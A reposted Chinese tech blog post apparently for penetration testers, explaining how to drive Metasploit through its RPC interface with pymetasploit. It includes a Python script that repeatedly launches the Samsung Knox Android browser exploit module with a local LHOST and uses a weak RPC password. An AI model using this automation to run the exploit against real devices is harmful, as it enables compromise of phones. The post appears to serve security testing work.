分享一個metasploit快速測試腳本的TIPS
相信用過metasploit的同學都很苦逼,msfconsole漫長的啟動時間,如果測試中敲錯命令,或不小心退出后又重啟任務,會讓你直接抓狂。之前不想重復敲命令,看了下metasploit的開發文檔,發現要自動化有各種方案,個人感覺最方便的是調用RPC接口,GITHUB上搜了把,發現有大拿封裝好了模塊,直接調用即可:
1.安裝pymetasploit模塊
git clone https://github.com/allfro/pymetasploit
</div>
切到目錄
sudo python setup.py install
2.啟動metasploit的RPC服務
msfrpcd -P test -n -f -a 127.0.0.1
這個test是rpc服務的密碼,用戶名默認是msf
3.定制自己的測試腳本
我這里定制的是測試三星knox漏洞的腳本,思路是每次啟動先把之前運行的job和console停掉,然后自動創建一個console自動敲入命令進行新的漏洞測試,直接crtl-c結束腳本再重新測試都是一個新的job,而且每次測試都是秒開,不用再重啟msfconsole了。中間各種接口怎么用,推薦大家再翻下官方的文檔。
from metasploit.msfrpc import MsfRpcClient
import time
client = MsfRpcClient('test')
jobs = client.call('job.list')
for num in jobs.keys():
if jobs[num].find('samsung_knox_smdm_url')>0:
client.call('job.stop',num)
console = client.call('console.list')
for _console in console['consoles']:
if _console.has_key('prompt'):
if _console['prompt'].find('samsung_knox_smdm_url')>0:
client.call('console.destroy', _console['id'])
cmd='''
use exploit/android/browser/samsung_knox_smdm_url
set LHOST 127.0.0.1
exploit
'''
res = client.call('console.create')
console_id = res['id']
client.call('console.write', console_id, cmd)
try:
while True:
res = client.call('console.read',console_id)
if len(res['data']) > 1:
print res['data'],
if res['busy'] == True:
time.sleep(1)
continue
except:
pass</pre>
來自:http://weibo.com/p/1001603795720149837992
本文由用戶 jopen 自行上傳分享,僅供網友學習交流。所有權歸原作者,若您的權利被侵害,請聯系管理員。
轉載本站原創文章,請注明出處,并保留原始鏈接、圖片水印。
本站是一個以用戶分享為主的開源技術平臺,歡迎各類分享!